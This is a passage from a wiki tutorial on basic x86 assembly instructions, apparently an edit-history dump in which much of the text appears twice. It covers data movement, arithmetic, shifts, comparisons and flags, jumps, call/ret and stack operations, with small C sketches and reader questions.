''ret'' can also have a parameter. This parameter is added to the stack pointer immediately after ret pops the return address. This addition allows the function to remove values that were pushed onto the stack before it was called, such as its arguments. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' is used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
; nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two operands (and throws away the result), and sets the flags based on that result. ''test'' is most commonly used with the same register as both operands (for example, ''test eax, eax'') to check if it's zero. <br />
<br />
Here are the most common flags:<br />
* Zero (ZF) -- set if and only if the result of the operation was zero (for cmp, this means the two operands are equal)<br />
* Sign (SF) -- set if the result was negative when viewed as a signed number (ie, its highest bit is 1)<br />
* Carry (CF) -- set if the operation carried or borrowed out of the highest bit (for cmp, this means the first operand is less than the second when both are treated as unsigned)<br />
* Overflow (OF) -- set if the signed result did not fit in the destination (ie, signed overflow occurred)<br />
There are no literal "greater than" or "less than" flags; the conditional jumps work out those relationships from combinations of the flags above.<br />
<br />
Flags are set by most arithmetic commands. The instructions most commonly used for comparisons are cmp, test, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl, jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' jumps if the first parameter is less than the second, treating both as signed values. ''jb'' ("jump if below") is its unsigned counterpart. The two are not interchangeable, because a value such as 0xFFFFFFFF is -1 when signed but very large when unsigned. <br />
* ''jg'' jumps if the first parameter is greater than the second (signed). <br />
* ''jle'' jumps if the first is "less than or equal to" the second (signed). <br />
* ''jge'' jumps if the first is "greater than or equal to" the second (signed).<br />
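<br />
The way cmp and the conditional jumps fit together can be sketched in C using the hardware flag names (ZF = zero, SF = sign, CF = carry, OF = overflow). The struct ''flags'' and the function names are made up for illustration; each jump function returns whether the jump would be taken. <br />

```c
#include <stdint.h>
#include <stdbool.h>

struct flags { bool zf, sf, cf, of; };

/* Models the flags produced by "cmp a, b" (computes a - b, discards it). */
struct flags cmp32(uint32_t a, uint32_t b)
{
    uint32_t result = a - b;
    struct flags f;
    f.zf = (result == 0);                          /* operands were equal   */
    f.sf = (result >> 31) != 0;                    /* top bit of the result */
    f.cf = (a < b);                                /* unsigned borrow       */
    f.of = (((a ^ b) & (a ^ result)) >> 31) != 0;  /* signed overflow       */
    return f;
}

bool je(struct flags f) { return f.zf; }
bool jb(struct flags f) { return f.cf; }                    /* unsigned <  */
bool jl(struct flags f) { return f.sf != f.of; }            /* signed <    */
bool jg(struct flags f) { return !f.zf && f.sf == f.of; }   /* signed >    */
```

Comparing 0xFFFFFFFF with 1 shows why signedness matters: jl would be taken (-1 is less than 1), but jb would not (4294967295 is not below 1). <br />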
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
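<br />
Written back in C with goto, the assembly loop looks like the sketch below. The function name ''count_iterations'' and the counter ''body_runs'' are hypothetical stand-ins for the loop body a and b. <br />

```c
/* Mirrors the numbered assembly above, one statement per line. */
int count_iterations(int limit)
{
    int ecx = 0;          /* 10 mov ecx, 0                     */
    int body_runs = 0;
line20:
    body_runs++;          /* 20, 30: stand-in for "a" and "b"  */
    ecx++;                /* 40 inc ecx                        */
    if (ecx < limit)      /* 50 cmp ecx, limit                 */
        goto line20;      /* 60 jl 20                          */
    return body_runs;
}
```

Because the comparison sits at the bottom, the body always runs at least once. That matches the for loop here only because the starting value 0 is known to be less than 5. <br />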
<br />
== Manipulating the Stack ==<br />
Instructions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
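<br />
A toy model of the stack in C makes the pointer movement visible. This is a sketch, not how a real CPU is implemented: the struct ''machine'' and its size are assumptions, and there is no overflow checking. <br />

```c
#include <stdint.h>

#define STACK_WORDS 16

struct machine {
    uint32_t memory[STACK_WORDS];  /* stack memory, one slot per 4 bytes */
    uint32_t esp;                  /* byte offset of the top of the stack */
};

/* An empty stack starts with esp just past the highest slot. */
void machine_init(struct machine *m)
{
    m->esp = STACK_WORDS * 4;
}

void push(struct machine *m, uint32_t value)
{
    m->esp -= 4;                     /* sub esp, 4      */
    m->memory[m->esp / 4] = value;   /* mov [esp], value */
}

uint32_t pop(struct machine *m)
{
    uint32_t value = m->memory[m->esp / 4];  /* mov reg, [esp] */
    m->esp += 4;                             /* add esp, 4     */
    return value;
}
```

Pushing 1 and then 2 lowers esp by 8; the first pop returns 2 and the second returns 1, leaving esp where it started. <br />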
<br />
=== pushaw, pushad, popaw, popad ===<br />
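''pushaw'' and ''pushad'' save all of the 16-bit or 32-bit general-purpose registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all of the 16-bit or 32-bit general-purpose registers from the stack, except that the saved stack pointer value is discarded rather than restored. <br />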
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Won't this just loop forever because ecx is never incremented? Total noob here so I may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, the stack pointer is decremented on a push, but incremented on a pop? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3131Simple Instructions2012-01-14T05:18:48Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the instructions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is composed of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page, however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov dword ptr [ebx], 3 ; store the 32-bit value 3 at the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov that copy a smaller value into a larger register, treating the source value as either signed (movsx) or unsigned (movzx). <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' (load effective address) is very similar to mov, except that math can be done on the original value before it is stored. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing''; it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax and store the result in edi -- edi = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax points to an array of 16-bit (2 byte) <br />
values, and that ebx is an index into it. Note the similarities <br />
between this and the previous example: the same kind of math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have another register, a constant value, or a value read from memory added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, not, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that the operation is performed between each pair of corresponding bits in the two operands, and the result is stored in the first operand. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and not does a bitwise negation (it inverts every bit). ''neg'' is the odd one out: it is an arithmetic instruction that computes the two's-complement negative of its operand (0 minus the value), not a bitwise inversion.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, 0FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
not eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
neg eax ; eax = -eax -- two's-complement negation, equivalent to (~eax) + 1.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the register pair edx:eax, which is treated as a single 64-bit value with the high 32 bits in edx and the low 32 bits in eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the 64-bit result in edx:eax. ''imul'' does the same thing, except the values are treated as signed. Here are some examples:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
''imul'' (but not ''mul'') also has forms that take two or three operands. These multiply the operands as expected, but keep only the low 32 bits of the result:<br />
imul ecx, edx ; ecx = ecx * edx<br />
imul ecx, 20h ; ecx = ecx * 0x20<br />
imul ecx, edx, 20h ; ecx = edx * 0x20<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert doubleword to quadword." In other words, it converts the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is zero or positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
<br />
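These are used to do a binary shift, equivalent to the C operations << and >>. shr is a logical shift that fills the vacated high bits with zeros, so it is used for unsigned values; sar fills them with copies of the sign bit, so it is used for signed values. shl and sal are two names for the same instruction.<br />
<br />
They each take two operands: the register to use, and the number of places to shift the value in the register. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />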
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the instruction immediately following the call (the return address) onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the value on top of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret jumps to whatever address it finds there. If that address is invalid, the program crashes immediately; otherwise it continues executing at the wrong place, where it will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack pointer immediately after ret pops the return address. This addition allows the function to remove values that were pushed onto the stack before it was called, such as its arguments. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' is used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
; nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two operands (and throws away the result), and sets the flags based on that result. ''test'' is most commonly used with the same register as both operands (for example, ''test eax, eax'') to check if it's zero. <br />
<br />
Here are the most common flags:<br />
* Zero (ZF) -- set if and only if the result of the operation was zero (for cmp, this means the two operands are equal)<br />
* Sign (SF) -- set if the result was negative when viewed as a signed number (ie, its highest bit is 1)<br />
* Carry (CF) -- set if the operation carried or borrowed out of the highest bit (for cmp, this means the first operand is less than the second when both are treated as unsigned)<br />
* Overflow (OF) -- set if the signed result did not fit in the destination (ie, signed overflow occurred)<br />
There are no literal "greater than" or "less than" flags; the conditional jumps work out those relationships from combinations of the flags above.<br />
<br />
Flags are set by most arithmetic commands. The instructions most commonly used for comparisons are cmp, test, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl, jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' jumps if the first parameter is less than the second, treating both as signed values. ''jb'' ("jump if below") is its unsigned counterpart. The two are not interchangeable, because a value such as 0xFFFFFFFF is -1 when signed but very large when unsigned. <br />
* ''jg'' jumps if the first parameter is greater than the second (signed). <br />
* ''jle'' jumps if the first is "less than or equal to" the second (signed). <br />
* ''jge'' jumps if the first is "greater than or equal to" the second (signed).<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Instructions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
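''pushaw'' and ''pushad'' save all of the 16-bit or 32-bit general-purpose registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all of the 16-bit or 32-bit general-purpose registers from the stack, except that the saved stack pointer value is discarded rather than restored. <br />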
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Won't this just loop forever because ecx is never incremented? Total noob here so I may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, the stack pointer is decremented on a push, but incremented on a pop? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboy